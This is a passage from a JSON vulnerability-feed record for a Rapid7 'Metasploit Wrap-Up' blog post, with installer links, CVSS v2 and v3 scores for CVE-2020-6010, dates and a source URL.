To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-27T19:03:42", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6010"], "modified": "2021-08-27T19:03:42", "id": "RAPID7BLOG:85C739BC95D61BF1E93C9617469F50C1", "href": "https://blog.rapid7.com/2021/08/27/metasploit-wrap-up-127/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}